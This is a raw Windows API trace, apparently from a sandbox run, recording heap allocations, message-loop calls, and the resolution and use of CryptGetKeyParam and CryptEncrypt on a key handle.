[0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0135.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0135.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0135.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0135.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0135.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0135.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796ec8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0135.088] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0135.088] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2a30, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a30*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0135.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0135.089] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0135.090] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 1 [0135.090] TranslateMessage (lpMsg=0x144e63c) returned 0 [0135.090] DispatchMessageW (lpMsg=0x144e63c) returned 0x0 [0135.090] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0135.090] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0135.090] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.090] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0135.090] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0135.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0135.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0135.091] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0135.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0135.091] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb240, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0135.092] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x13845, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x13850) returned 1 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0135.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0135.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 